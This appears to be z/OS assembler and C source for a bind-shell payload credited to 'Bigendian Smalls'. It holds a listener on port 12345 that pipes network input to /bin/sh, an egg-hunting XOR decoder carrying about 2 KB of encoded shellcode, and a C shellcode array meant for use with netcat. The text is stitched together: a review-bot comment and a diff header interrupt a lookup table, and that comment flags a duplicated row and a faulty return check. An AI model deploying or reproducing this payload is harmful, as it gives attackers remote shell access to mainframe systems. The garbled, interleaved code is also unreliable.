CIB 2,0,7,@PREPPAR # R2 not 0? We are parent, move on
*************************************************
* order of things to prep child pid *
* 0) Close parent write fd *
* 1) Close child read fd *
* 2) dupe parent read fd to std input *
* 3) dupe child write fd to std output *
* 4) dupe child write fd to std err *
* 5) Close parent read fd *
* 6) Close child write fd *
* 7) exec /bin/sh *
*************************************************
LARL 14,@PRC1
LA 2,F_CLOSFD
L 5,PFDW # load R5 with pfdw
L 6,PFDW # load R5 with pfdw
@PRC0 BRC 15,LFCNTL # call close
@PRC1 LARL 14,@PRC2
LA 2,F_CLOSFD
L 5,CFDR # load R5 with cfdr
L 6,CFDR # load R5 with cfdr
BRC 15,LFCNTL # call close
@PRC2 LARL 14,@PRC3
LA 2,F_DUPFD2 # gonna do a dup2
L 5,PFDR # parent read fd
LGFI 6,0 # std input
BRC 15,LFCNTL # call dupe2
@PRC3 LARL 14,@PRC4
LA 2,F_DUPFD2 # gonna do a dup2
L 5,CFDW # child write fd
LGFI 6,1 # std output
BRC 15,LFCNTL # call dupe2
@PRC4 LARL 14,@PRC5 # if 0 we are in child pid, goto exec
LA 2,F_DUPFD2 # gonna do a dup2
L 5,CFDW # child write fd
LGFI 6,2 # std error
BRC 15,LFCNTL # call dupe2
@PRC5 LARL 14,@PRC6
LA 2,F_CLOSFD
L 5,PFDR # load R5 with pfdr
L 6,PFDR # load R5 with pfdr
BRC 15,LFCNTL # call close
@PRC6 LARL 14,@PRC7
LA 2,F_CLOSFD
L 5,CFDW # load R5 with cfdw
L 6,CFDW # load R5 with cfdw
BRC 15,LFCNTL # call close
@PRC7 BRAS 0,LEXEC
***********************************************************************
* *
* BP1EXC (EXEC) execute shell '/bin/sh' *
* *
***********************************************************************
LEXEC L 15,BEXC # load func addr to 15
CALL (15),(EXCMDL,EXCMD,EXARGC,EXARGLL,EXARGL, x
EXENVC,EXENVLL,EXENVL, x
EXITRA,EXITPLA, x
RTN_VAL,RTN_COD,RSN_COD),VL
BRAS 0,GOODEX # exit child proc after exec
****************************************************
* prepare the parent process to speak with child *
* order of things to prep parent pid *
* 0) close parent fd read *
* 1) close child fd write *
* 2) socket,bind,accept,listen,read & write *
* 3) set client socked and child fd write *
* to non_blocking *
****************************************************
@PREPPAR LARL 14,@PRP1
LA 2,F_CLOSFD
L 5,PFDR # load R5 with pfdr
L 6,PFDR # load R5 with pfdr
BRC 15,LFCNTL # call close
@PRP1 LARL 14,LSOCK
LA 2,F_CLOSFD
L 5,CFDW # load R5 with cfdw
L 6,CFDW # load R5 with cfdw
BRC 15,LFCNTL # call close
***********************************************************************
* *
* BPX1SOC set up socket - inline *
* *
***********************************************************************
LSOCK L 15,BSOC # load func addr to 15
CALL (15),(DOM,TYPE,PROTO,DIM,SRVFD, x
RTN_VAL,RTN_COD,RSN_COD),VL
*******************************
* chk return code, 0 or exit *
*******************************
LHI 15,2
L 6,RTN_VAL
CIB 6,0,7,EXITP # R6 not 0? Time to exit
***********************************************************************
* *
* BPC1BND (bind) bind to socket - inline *
* *
***********************************************************************
LBIND L 15,BBND # load func addr to 15
LA 5,SRVSKT # addr of our socket
USING SOCKADDR,5 # layout sockaddr over R5
XC SOCKADDR(16),SOCKADDR # zero sock addr struct
MVI SOCK_FAMILY,AF_INET # family inet
MVI SOCK_LEN,SOCK#LEN # len of socket
MVC SOCK_SIN_PORT,LISTSOCK # list on PORT 12345
MVC SOCK_SIN_ADDR,LISTADDR # listen on 0.0.0.0
DROP 5
CALL (15),(SRVFD,SOCKLEN,SRVSKT, x
RTN_VAL,RTN_COD,RSN_COD),VL
*******************************
* chk return code, 0 or exit *
*******************************
LHI 15,3
L 6,RTN_VAL
CIB 6,0,7,EXITP # R6 not 0? Time to exit
***********************************************************************
* *
* BPX1LSN (listen) listen on created socket - inline *
* *
***********************************************************************
LLIST L 15,BLSN # load func addr to 15
CALL (15),(SRVFD,BACKLOG, x
RTN_VAL,RTN_COD,RSN_COD),VL
*******************************
* chk return code, 0 or exit *
*******************************
LHI 15,4
L 6,RTN_VAL
CIB 6,0,7,EXITP # R6 not 0? Time to exit
***********************************************************************
* *
* BPX1ACP (accept) - accept conn from socket - inline *
* *
***********************************************************************
LACPT L 15,BACP # load func addr to 15
LA 5,CLISKT # addr of our socket address
USING SOCKADDR,5 # set up addressing for sock struct
XC SOCKADDR(8),SOCKADDR #zero sock addr struct
MVI SOCK_FAMILY,AF_INET
MVI SOCK_LEN,(SOCK#LEN+SOCK_SIN#LEN)
DROP 5
CALL (15),(SRVFD,CLILEN,CLISKT, x
CLIFD,RTN_COD,RSN_COD),VL
****************************************************
* chk return code here anything but -1 is ok *
****************************************************
LHI 15,5
L 6,CLIFD
CIB 6,-1,8,EXITP # R6 = -1? Time to exit
****************************************************
* Set clifd and child fd read to non_blocking *
****************************************************
@SNB1 LARL 14,@SNB2
LA 2,F_GETFL # get file status flags
L 5,CLIFD # client sock fd
XR 6,6 # for getfd, arg is 0
BRC 15,LFCNTL # call dupe2
@TFLAG DC F'0'
@SNB2 ST 7,@TFLAG # R7 will have our flags
LA 5,O_NONBLOCK # add non-blocking flag
OR 7,5 # or to add the flag to R7
LARL 14,@SNB3
LA 2,F_SETFL # set file status flags
L 5,CLIFD # client sock fd
LR 6,7 # put new flags in R6
BRC 15,LFCNTL # call dupe2
@SNB3 LARL 14,@SNB4
LA 2,F_GETFL # get file status flags
L 5,CFDR # child fd read
XR 6,6 # for getfd, arg is 0
BRC 15,LFCNTL # call dupe2
@SNB4 ST 7,@TFLAG # R7 will have our flags
LA 5,O_NONBLOCK # add non-blocking flag
OR 7,5 # or to add the flag to R7
LARL 14,@READCLI # when we ret, enter main loop
LA 2,F_SETFL # set file status flags
L 5,CFDR # child fd read
LR 6,7 # put new flags in R6
BRC 15,LFCNTL # call dupe2
***********************************************************************
* *
* Main read from client socket looop starts here *
* *
***********************************************************************
@READCLI L 5,CLIFD # read from CLIFD
LA 7,@READCFD # Nothing read, return to here
LARL 14,@A2E1 # Bytes read, return to here
BRC 15,LREAD # Brach to read function
*******************************
* CALL A2E *
* change CLIBUF from *
* ASCII to EBCDIC *
*******************************
@A2E1 LARL 14,@CCW1 # load return area in r14
BRC 15,CONVAE # call e2a func
@CCW1 LARL 14,@READCFD # after write, read child fd
L 5,PFDW # write to child process fd
BRC 15,LWRITE # call write function
***********************************************************************
* *
* Read from child fd loop starts here *
* *
***********************************************************************
@READCFD L 5,CFDR # read from child fd
LA 7,@READCLI # nothing read, back to socket read
LARL 14,@E2A1 # Bytes read, return to here
BRC 15,LREAD # Branch to read function
*******************************
* CALL E2A *
* change CLIBUF from *
* EBCIDIC to ASCII *
*******************************
@E2A1 LARL 14,@CCW2 # load return area in r14
BRC 15,CONVEA # call e2a func
@CCW2 LARL 14,@READCFD # loop read child proc fd after write
L 5,CLIFD # write to client socked fd
BRC 15,LWRITE # call write function
********************************************************
* Functions beyond this point, no more inline *
* execution beyond here should occur *
********************************************************
***********************************************************************
* *
* BPX1RED (read) - function *
* R5 has file descriptor to read from *
* R7 has nothing read address *
* R14 has good read return address *
* *
***********************************************************************
LREAD L 15,BRED # load func addr to 15
ST 5,@TRFD # file descriptor we are reading
ST 7,@NRA # no bytes read: return address
ST 14,SAVEAREA # bytes read: return address
XR 1,1 # clear R1
ST 1,BREAD # clear Bytes Read
L 5,CLIBUF # clibuf addr
XC 0(52,5),0(5) # 0 out cli buf
BRAS 0,@CRED # jump to call
@TRFD DC 4XL1'0' # temp var for rd to read
@NRA DC 4XL1'0' # temp var for not read ret addr
@CRED CALL (15),(@TRFD,CLIBUF,ALET,CLIREAD, x
BREAD,RTN_COD,RSN_COD),VL
****************************************************
* chk return code here anything but -1 is ok *
* for non-blocking fd's we have to check *
* both the return val and code to make sure *
* it didn't fail just b/c non-blocking and no *
* data available vs just a read error *
****************************************************
L 14,SAVEAREA # bytes read RA
L 7,@NRA # no bytes read RA
LHI 15,6 # exit code for this function
L 6,BREAD # bytes read (aka rtn val)
CIB 6,0,2,0(14) # bytes read, process them
CIB 6,0,8,0(7) # OK rtn code, on to nobyte read
L 6,RTN_COD # load up return code
LA 1,EWOULDBLOCK # load up the non-blocking RTNCOD
LA 2,EAGAIN # load up the other OK nblck RTNCOD
CRB 6,1,8,0(7) # OK rtn code, on to nobyte read
CRB 6,2,8,0(7) # OK rtn code, on to nobyte read
BRAS 0,EXITP # -1 and not due to blocking, exit
***********************************************************************
* *
* BPX1WRT (WRITE) - function *
* R5 has file descriptor to read from *
* *
***********************************************************************
LWRITE L 15,BWRT # load func addr to 15
ST 5,@TWFD # store fd in temp fd
ST 14,SAVEAREA # save return address
BRAS 0,@CWRT # jump to write
@TWFD DC A(*) # temp holder for fd
@CWRT CALL (15),(@TWFD,CLIBUF,ALET,BREAD, x
BWRIT,RTN_COD,RSN_COD),VL
**************************************************************
* chk return code here anything but neg 1 is ok *
* exit if a match (8) *
**************************************************************
L 14,SAVEAREA # restore return address
LHI 15,9 # exit code for this func
L 6,BWRIT # set r6 to rtn val
CIB 6,-1,8,EXITP # exit if R6 = -1
BCR 15,14 # back to return address
***********************************************************************
* *
* BPX1FCT (fcntl) edit file descriptor *
* for dup2 set R2=F_DUPFD2 *
* R5=fd to modify R6=fd to set R5 equal to *
* equivalent to dupe2(R5,R6) *
* for read flags, set R2=F_GETFL *
* R5=fd, R6=0, R7=rtn flags *
* for write flags, set R2=F_SETFL *
* R5=fd, R6=<new flags> R7=0 *
* for close, set R2=F_CLOSFD *
* R5=R6 = fd to close (optionally R5 & R6 can be a range *
* of FDs to close) *
* *
***********************************************************************
LFCNTL L 15,BFCT # load func addr to 15
ST 14,SAVEAREA # save return address
ST 5,@FFD # fd to be duplicated
ST 2,@ACT # action field for BPX1FCT
ST 6,@ARG # r6 should have the biggest fd
BRAS 0,@FCTL
@FFD DC F'0'
@ACT DC F'0'
@ARG DC F'0'
@RETFD DC F'0'
@FCTL CALL (15),(@FFD,@ACT,@ARG,@RETFD,RTN_COD,RSN_COD),VL
****************************************************
* chk return code here anything but -1 is ok *
****************************************************
LHI 15,11 # exit code for this func
L 7,@RETFD # set r6 to rtn val
CIB 7,-1,8,EXITP # r6 = -1 exit
L 14,SAVEAREA # reload ret address
BCR 15,14 # return to caller
***********************************************************************
* *
* BPX1PIP (pipe) create pipe - no input *
* returns: R5=read fd R6=write fd *
* *
***********************************************************************
LPIPE L 15,BPIP # load func addr to 15
ST 14,SAVEAREA # save return address
BRAS 0,@PIP
@RFD DC F'0' # read file desc
@WFD DC F'0' # write file desc
@PIP CALL (15),(@RFD,@WFD,RTN_VAL,RTN_COD,RSN_COD),VL
****************************************************
* chk return code here anything but -1 is ok *
****************************************************
LHI 15,12 # exit code for this func
L 6,BWRIT # set r6 to rtn val
CIB 6,-1,8,EXITP
L 5,@RFD # load R5 with read fd
L 6,@WFD # load R6 with write fd
L 14,SAVEAREA # reload ret address
BCR 15,14 # return to caller
***********************************************************************
* *
* CONVAE - convert CLIBUF ascii to ebcidic *
* function looks up ascii byte and returns ebcdic *
* expects return address in R14 *
* *
***********************************************************************
CONVAE LHI 6,1 # R6 has number 1
L 4,BREAD # num of bytes read
L 1,CLIBUF # address of cli sock input
LOOP1 L 2,A2E # address of a2e buff
SR 2,6 # subtract 1 from R2 addr
LB 3,0(0,1) # Load byte from cli into R3
NILF 3,X'FF' # make sure R3 is 1 positive byte
AR 2,3 # add ascii val to a2e buff
LB 3,0(0,2) # load byte from a2e buff into R3
NILF 3,X'FF' # make sure R3 is 1 positive byte
STC 3,0(0,1) # store R3 byte back into cli buff
AR 1,6 # increment client buff
SR 4,6 # sub1 from ctr, loop if non-neg
BRC 7,LOOP1 # looop
BCR 15,14 # return to caller
***********************************************************************
* *
* CONVEA - convert CLIBUF ebcidic to ascii *
* function looks up ebcidic byte and returns ascii *
* expects return address in R14 *
* *
***********************************************************************
CONVEA LHI 6,1 # R6 has number 1
L 4,BREAD # num of bytes read
L 1,CLIBUF # address of cli sock input
LOOP2 L 2,E2A # address of e2a buff
SR 2,6 # subtract 1 from R2 addr
LB 3,0(0,1) # Load byte from cli into R3
NILF 3,X'FF' # make sure R3 is 1 positive byte
AR 2,3 # add ascii val to e2a buff
LB 3,0(0,2) # load byte from e2a buff into R3
STC 3,0(0,1) # store R3 byte back into cli buff
NILF 3,X'FF' # make sure R3 is 1 positive byte
AR 1,6 # increment client buff
SR 4,6 # sub1 from ctr, loop if non-neg
BRC 7,LOOP2 # looop
BCR 15,14 # return to caller
****************************************************
* cleanup & exit *
* preload R15 with exit code *
****************************************************
GOODEX XR 15,15 # zero return code
EXITP ST 15,0(,11)
L 13,4(,11)
LM 14,12,12(13) # restore registers
LARL 5,SAVEAREA
L 15,0(0,5)
BCR 15,14 # branch to caller
**********************
**********************
* *
* Constant Sections *
* *
**********************
**********************
@CONST DS 0F # constants full word boundary
SAVEAREA DC X'00000000'
DC X'00000000'
ALET DC F'0'
O_NONBLOCK EQU X'04' # bit for nonblocking io
EWOULDBLOCK EQU X'44E' # rtncod for nonblk read sock
EAGAIN EQU X'70' # rtncod for nonblk, not thr
*************************
* Function addresses * # pipe variables
*************************
FFUNC DC A(BFRK) # address of first function
NUMFUNC DC F'11' # number of funcs listed below
BFRK DC CL8'BPX1FRK ' # Fork
BEXC DC CL8'BPX1EXC ' # Exec
BSOC DC CL8'BPX1SOC ' # Socket
BBND DC CL8'BPX1BND ' # Bind
BLSN DC CL8'BPX1LSN ' # Listen
BACP DC CL8'BPX1ACP ' # Accept
BRED DC CL8'BPX1RED ' # Read
BWRT DC CL8'BPX1WRT ' # Write
BCLO DC CL8'BPX1CLO ' # Close
BFCT DC CL8'BPX1FCT ' # Fcntl
BPIP DC CL8'BPX1PIP ' # Pipe
*************************
* Socket conn variables * # functions used by pgm
*************************
LISTSOCK DC XL2'3039' # port 12345
LISTADDR DC XL4'00000000' # address 0.0.0.0
BACKLOG DC F'1' # 1 byte backlog
DOM DC A(AF_INET) # AF_INET = 2
TYPE DC A(SOCK#_STREAM) # stream = 1
PROTO DC A(IPPROTO_IP) # ip = 0
DIM DC A(SOCK#DIM_SOCKET) # dim_sock = 1
SRVFD DC A(*) # server FD
SRVSKT DC 16XL1'77' # srv socket struct
SOCKLEN DC A(SOCK#LEN+SOCK_SIN#LEN)
CLILEN DC A(*) # len of client struct
CLISKT DC 16XL1'88' # client socket struct
CLIFD DC A(*) # client fd
************************
* BPX1PIP vars ********* # pipe variables
************************
CFDR DC F'0' # child proc FD read
CFDW DC F'0' # child proc FD write
PFDR DC F'0' # parent proc FD read
PFDW DC F'0' # parent proc FD write
************************
* BPX1FRK vars *********
************************
CPROCN DC F'-1' # child proc #
************************
* BPX1EXC vars *********
************************
EXCMD DC CL7'/bin/sh' # command to exec
EXCMDL DC A(L'EXCMD) # len of cmd to exec
EXARGC DC F'1' # num of arguments
EXARG1 DC CL2'sh' # arg 1 to exec
EXARG1L DC A(L'EXARG1) # len of arg1
EXARGL DC A(EXARG1) # addr of argument list
EXARGLL DC A(EXARG1L) # addr of arg len list
EXENVC DC F'0' # env var count
EXENVL DC F'0' # env var arg list addr
EXENVLL DC F'0' # env var arg len addr
EXITRA DC F'0' # exit routine addr
EXITPLA DC F'0' # exit rout parm list addr
**************************
* Socket read/write vars *
**************************
CLIREAD DC A(L'@CBUF) # one less than buf
CLIBUF DC A(@CBUF) # buff for read cli sock
@CBUF DC 52XL1'22'
BREAD DC F'0' # bytes read
BWRIT DC F'0' # bytes written
*********************
* Return value vars *
*********************
RTN_VAL DC A(*) # return value
RTN_COD DC A(*) # return code
RSN_COD DC A(*) # reason code
***************************
***** end of constants ****
***************************
****************************************************
* ebcidic to ascii lookup *
* read hex(ebcidic char) bytes from beginning of *
* array to get ascii byte *
****************************************************
TITLE 'sb_shellcode.s x
Author: Bigendian Smalls'
ACONTROL AFPR
SBSHELL CSECT
SBSHELL AMODE 31
SBSHELL RMODE ANY
SYSSTATE ARCHLVL=2
ENTRY MAIN
MAIN DS 0F
** Begin setup and stack management **
STM 6,4,12(13) # store all the registers in old SP area
LARL 15,*-4 # put base addr into R15
LR 12,15 # put given base addr into R12
XR 1,1 # zeroout R1 for counting
XR 2,2 # zeroout R1 for counting
XR 3,3 # zeroout R3
AFI 1,X'01010102' # loading a 1 in R1
AFI 2,X'01010103' # loading a 1 in R1
XR 1,2 # loading a 1 in R1
LR 4,1 # will put a 4 in R4
SLA 4,1(1) # make R1 == 4
XR 10,10 # zeroout R10 for our egg
XR 2,2 # zero 2
LGFI 10,X'deadbeef' # load egghunter value into R10
LR 11,12 # load base int R11
LOOPER AR 11,1 # add 1 to R11
L 3,1(2,11) # retrieve value at R11 +1 indexR2=0
CR 10,3 # compare egg with R11 mem pointer
BRC 7,LOOPER # branch anything but equal
AR 11,4
L 3,1(2,11) # retrieve value at R11 +1 indexR2=0
CR 10,3 # compare egg with R11 mem pointer
BRC 7,LOOPER # 2nd check 2 in a row good to go!
AR 11,1 # 1 for the offset from above
SR 11,4 # 4 to skip last egg
ST 13,4(,11) # store old SP for later in wkg area
ST 11,8(,13) # store this in old wking area
LR 13,11 # set up R13 pt to new wkg area
** End setup and stack management **
** Begin main decoding routine **
LR 3,11 # This is now our egghunter loc
AR 3,4 # add 4 to 3
AR 3,4 # R3 points to SC for decoding
LR 5,3 # R5 points to SC for jumping to
SR 3,1 # R3-1 to we can XI that addr w/o nulls
SR 3,1 # R3-1 to we can XI that addr w/o nulls
LR 4,1 # R4 has static 1
XR 1,1 # R1 will be our byte counter
XR 2,2 # R2 will be address pointer
LOOP1 AR 1,4 # add 1 to R1 byte counter
ARK 2,3,1 # generate new address pointer
* put the XOR key (enc buffer char) from below in the quotes below
XI 1(2),X'4b' # xor byte with key
* put the buffer len (num of bytes) in the next cmd in CHI 1,<here>
CHI 1,2088 # to yield sc len
BRC 4,LOOP1 # loop bwd 18 bytes if R1 < size
XR 4,4
** Begin cleanup and stack management **
L 13,4(4,11) # reload old SP
LM 6,4,12(13) # restore registers
BCR 15,5 # jmp to sc
** End main decoding routine **
DC X'DEADBEEF' #egg
DC X'DEADBEEF' #egg + old sp
*******************************************************************
*Number of bytes: 2088
*Padding bytes: 0
*Enc buffer char: 0x4b
*ASM buffer:
DC X'dba79b478bbbb4b4b4b553448b0b4b4b48af1b9b0b4f539fecd34bX
4aec834b4fecae48708f144b4b48bd8f244b4b48beecae48788f144bX
4b48b98f244b4b48ba8fb64b4b489f8b5b4b4b4b5a533a1b3c4b4b51X
371b3b3b4b5137ee31cb4b1b3b3b4becbf4b424b4b4b4b4b4b4b4b4bX
4b4b4b4b4b4ea48f66b4b4b4b2a76c4b'
DC X'fa4b350a6b4b428f164b4b4880532eecae49fe8f164b4b48f4532eX
ecae49e40a6b4b438f164b4b48f08b2a4b4b4b4becae49ee8f164b4bX
48fa8b2a4b4b4b4aecae49d68f164b4b48e28b2a4b4b4b49ecae49deX
0a6b4b428f164b4b48ea532eecae49c68f164b4b48d2532eecae49ccX
8fb64b4b48348b5b4b4b4b138b3b4b4b'
DC X'4b0e8f344b4b4b1951378f344b4b4b1b8b3b4b4b4b0a8f344b4b4bX
0751378f344b4b4b7551378f344b4b4b0d51378f344b4b4b7151378fX
344b4b4b0b8b3b4b4b481a8f344b4b4b778f344b4b4b708f344b4b4bX
718f344b4b4b728f344b4b4b738b3b4b4b4b7c8f344b4b4b7f51378fX
344b4b4b795137ee31cb4b8f344b4b4b'
DC X'65ec4e4b664b4b4b4b4b4c2ac9c2de2ae9c34b4b4b4b4a4b4b4b49X
4b4b4b4be9c34b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4bX
4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4bX
4b4b4b4b4b4b4b4b4ea4ec4e49a78bab4b4b4b400a6b4b428f164b4bX
4853532eecbf494feca14b5b8f164b4b'
DC X'4845532eecbf4ab78fb64b4b49bd8b5b4b4b4b7e8b3b4b4b49a18fX
344b4b4b648b3b4b4b49a98f344b4b4b608b3b4b4b49918f344b4b4bX
6c8b3b4b4b499d8f344b4b4b688b3b4b4b4b538f344b4b4b548b3b4bX
4b4b558f344b4b4b5051378f344b4b4b525137ee31cb4b8f344b4b4bX
5eec4e4b5f4b4b4b4b4b4b4b4b4b4b4b'
DC X'4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4ea4X
8fb64b4b49e48b5b4b4b4b618b3bb4b4b4ac8f344b4b4b6f8b3b4b4bX
4b548f344b4b4b6b8b3b4b4b49f88f344b4b4b578b3b4b4b4b508f34X
4b4b4b5351378f344b4b4b5d5137ee31cb4b8f344b4b4b59ec4e4b5aX
4b4b4b4b4b5b4b4b4b4b4b4b4b4b4b4b'
DC X'4b4b4b4b4b4b4b4b4b4b4b4b4b4b4ea453b78f26b4b4b4b3a72c49X
1a4b358fb64b4b493b8b5b4b4b4b6a8b3bb4b4b4ed8f344b4b4b508bX
3b4b4b49138f344b4b4b5c8b3b4b4b4b5d8f344b4b4b5851378f344bX
4b4b5a5137ee31cb4b8f344b4b4b46ec4e4b474b4b4b4b4b4b4b4b4bX
4b4b4b4b4b4b4b4b4b4b4b4ea48fb64b'
DC X'4b49088b5b4b4b4b7d8b3bb4b4b43c8f344b4b4b7b8b3b4b4b4b62X
8f344b4b4b678b3b4b4b4b508f344b4b4b638b3b4b4b4b548f344b4bX
4b6f8b3b4b4b4b688f344b4b4b6b5137ee31cb4b8f344b4b4b57ec4eX
4b504b4b4b4b4b4b4b4b4b4b5b494b4b4b4b4b4b4b4b4b4b4b4b4b4bX
4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b'
DC X'4b4b4b4b4b4b4b4b4ea48bab4b4b4b470a6b4b4f8f16b4b4b4a7ecX
234b4cecbf4bbaeca14b598f164b4b4ab2ec234b4decbf4ba38b1bb4X
b4b4978b3b4b4b4b47ecae4b50ecae4a228b1b4b4b4aa5ecae4bc38bX
1b4b4b4aa88b3bb4b4b4a5ecae4b47ecae4ace8babb4b4b4bd8b1bb4X
b4b48becbf4b3d8fb64b4b4a82537c8f'
DC X'a44b4b4ae48b6b4b4b4b079c4c6b4b6b4b8b6b4b4b4b759c446b4bX
6b4b8f144b4b4b098b5b4b4b4b748b3b4b4b4b798f344b4b4b608b3bX
4b4b4b638f344b4b4b7e8b3b4b4b4ad98f344b4b4b7a8b3b4b4b4b55X
8f344b4b4b668b3b4b4b4b698f344b4b4b628b3b4b4b4b638f344b4bX
4b6e5137ee31cb4b8f344b4b4b6aec4e'
DC X'4b6b4b4b4b4b4b4b4b4b4b4b4b4a69696969696969696969696969X
6969694b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4bX
4b4b4b4b4b4b4b4ea48fa64b4b4a04533853b28f26b4b4b4a1a729abX
4b4bb5a7233b4bb4b5ec4e4a7a8fb64b4b4a1c8fa44b4b4a778b5b4bX
4b4b7a8b3bb4b4b4858f344b4b4b628b'
DC X'3b4b4b4b6d8f344b4b4b6c8f144b4b4b698b3b4b4b4a608f344b4bX
4b6b8b3bb4b4b48a8f344b4b4b5751378f344b4b4b5151378f344b4bX
4b535137ee31cb4b8f344b4b4b5fec4e4b584b4b4b4b4b4b4b4b4b4bX
4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4ea48fa6X
4b4b4bb28f26b4b4b4bd53bda7234ba9'
DC X'b4354cb58fb64b4b4a438fa44b4b4ba08b5b4b4b4b79533a503750X
3750378f144b4b4b6e8f344b4b4b638f644b4b4b6a51378f344b4b4bX
688f244b4b4b5751378f344b4b4b5551378f344b4b4b5751378f344bX
4b4b515137ee31cb4b8f344b4b4b5dec4e4b5e4b4b4b4b4b4b4b4b4bX
4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b'
DC X'4b4b4b4b4b4b4b4b4b4b4b4b4b4ea48fa64b4b4be28f36b4b4b4bdX
a7334bd8b4354cb58fb64b4b4bf08fa44b4b4bd78b5b4b4b4b50533aX
8f344b4b4b5c51378f344b4b4b5e51378f344b4b4b5851378f344b4bX
4b5a5137ee31cb4b8f344b4b4b46ec4e4b474b4b4b4b4b4b4b4b4b4bX
4b4b4b4b4b4b4b4b4b4b4ea48f26b4b4'
DC X'b4b2a7234b2bb4358f16b4b4b4a48f26b4b4b4a58fa64b4b4b2c4cX
b58b5bb4b4b5b08f06b4b4b44b8b6b4b4b4bccecc34b5ea87b5b4b4bX
3d8b704b4b4bb45273ec3f4b4dec234bceecbf4b45a81b6b4b4b3d8bX
104b4b4bb451625122527eec3fb4bc5022092b5b4b51525002ec3fb4X
a84cb58f06b4b4b5938b5bb4b4b586ec'
DC X'c34bce8b6b4b4b4b115062a87b5b4b4b3d8b704b4b4bb45273ec3fX
4b4dec734b2eecbf4b425168a87b6b4b4b3d8b704b4b4bb4097b5b4bX
51525002ec3fb4af4cb55cb48b0b4b4b4b5b1bbb0b4b139b0b4fd3a7X
9b478b0b4b4b4b4c13bb0b4b4cb54b4b4b4b4b4b4b4b4b4b4b4b4b4bX
4b4b4b4a4b4b4b494a1878f74a1878ef'
DC X'4a187c5b4a187d7d4a187d234a187d6f4a1878554a1878c14a1879X
074a18784d4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b4b49497b724b4b4bX
4b'
E2ABUF DC X'0102039c09867f978d8e0b0c0d0e0f101112139d0a08871819928fX
1c1d1e1f808182838485171b88898a8b8c0506079091169394959604X
98999a9b14159e1a20a0e2e4e0e1e3e5e7f1a22e3c282b7c26e9eaebX
98999a9b14FF9e1a20a0e2e4e0e1e3e5e7f1a22e3c282b7c26e9eaebX
e8edeeefecdf21242a293b5e2d2fc2c4c0c1c3c5c7d1a62c255f3e3fX
f8c9cacbc8cdcecfcc603a2340273d22'
DC X'd8616263646566676869abbbf0fdfeb1b06a6b6c6d6e6f707172aaX
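Review bot: the E2ABUF table that closes this hunk carries a duplicated row: the third and fourth `DC` lines both begin `98999a9b14` and differ only in one byte (`15` versus `FF`), so the table is 27 bytes longer than it should be and every EBCDIC value past that row makes CONVEA pick the wrong ASCII byte. The C-array copy of the same table further down the file carries only the `\x14\xff\x9e` form, so one of the two assembler rows should be dropped. Two smaller points in the same region: LPIPE checks the result with `L 6,BWRIT # set r6 to rtn val` although the BPX1PIP call passes `RTN_VAL`, so the `-1` test inspects the previous write count rather than the pipe result; and the `TITLE 'sb_shellcode.s ...'` / `SBSHELL CSECT` decoder source is pasted between the "ebcidic to ascii lookup" comment banner and the E2ABUF it describes, which makes the file read as two assembler sources interleaved and should be split into separate sections with their own banners.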
@ -587,24 +161,170 @@ E2ABUF DC X'0102039c09867f978d8e0b0c0d0e0f101112139d0a08871819928fX
4c4d4e4f505152b9fbfcf9faff5cf7535455565758595ab2d4d6d2d3X
d530313233343536373839b3dbdcd9da'
DC X'9f'
E2A DC A(E2ABUF)
****************************************************
* ascii to ebcidic lookup *
* read hex(ascii char) bytes from beginning of *
* array to get ebcidic byte *
****************************************************
A2EBUF DC X'010203372d2e2f1605150b0c0d0e0f101112133c3d322618193f27X
1c1d1e1f405a7f7b5b6c507d4d5d5c4e6b604b61f0f1f2f3f4f5f6f7X
f8f97a5e4c7e6e6f7cc1c2c3c4c5c6c7c8c9d1d2d3d4d5d6d7d8d9e2X
e3e4e5e6e7e8e9ade0bd5f6d79818283848586878889919293949596X
979899a2a3a4a5a6a7a8a9c04fd0a107'
DC X'202122232425061728292a2b2c090a1b30311a333435360838393aX
3b04143eff41aa4ab19fb26ab5bbb49a8ab0caafbc908feafabea0b6X
b39dda9b8bb7b8b9ab6465626663679e687471727378757677ac69edX
eeebefecbf80fdfefbfcbaae594445424643479c4854515253585556X
578c49cdcecbcfcce170dddedbdc8d8e'
DC X'df'
A2E DC A(A2EBUF)
BPXYSOCK LIST=YES # MACRO MAP for socket structure
BPXYFCTL LIST=YES # MACRO MAP for fcntl structure
END @SETUP
******************************************************************
DC X'8BADF00D' eof marker
END
########################################################################
\* For SystemZ USS *\
\* Bind shell payload listens on port 12345 on 0.0.0.0 *\
\* Use netcat to connect *\
\* Author: Bigendian Smalls *\
char sc[]=
"\x90\x64\xd0\x0c\xc0\xf0\xff\xff\xff\xfe\x18\xcf\x17\x11\x17\x22"
"\x17\x33\xc2\x19\x01\x01\x01\x02\xc2\x29\x01\x01\x01\x03\x17\x12"
"\x18\x41\x8b\x40\x10\x01\x17\xaa\x17\x22\xc0\xa1\xde\xad\xbe\xef"
"\x18\xbc\x1a\xb1\x58\x32\xb0\x01\x19\xa3\xa7\x74\xff\xfc\x1a\xb4"
"\x58\x32\xb0\x01\x19\xa3\xa7\x74\xff\xf6\x1a\xb1\x1b\xb4\x50\xd0"
"\xb0\x04\x50\xb0\xd0\x08\x18\xdb\x18\x3b\x1a\x34\x1a\x34\x18\x53"
"\x1b\x31\x1b\x31\x18\x41\x17\x11\x17\x22\x1a\x14\xb9\xf8\x10\x23"
"\x97\x4b\x20\x01\xa7\x1e\x08\x28\xa7\x44\xff\xf9\x17\x44\x58\xd4"
"\xb0\x04\x98\x64\xd0\x0c\x07\xf5\xde\xad\xbe\xef\xde\xad\xbe\xef"
"\xdb\xa7\x9b\x47\x8b\xbb\xb4\xb4\xb4\xb5\x53\x44\x8b\x0b\x4b\x4b"
"\x48\xaf\x1b\x9b\x0b\x4f\x53\x9f\xec\xd3\x4b\x4a\xec\x83\x4b\x4f"
"\xec\xae\x48\x70\x8f\x14\x4b\x4b\x48\xbd\x8f\x24\x4b\x4b\x48\xbe"
"\xec\xae\x48\x78\x8f\x14\x4b\x4b\x48\xb9\x8f\x24\x4b\x4b\x48\xba"
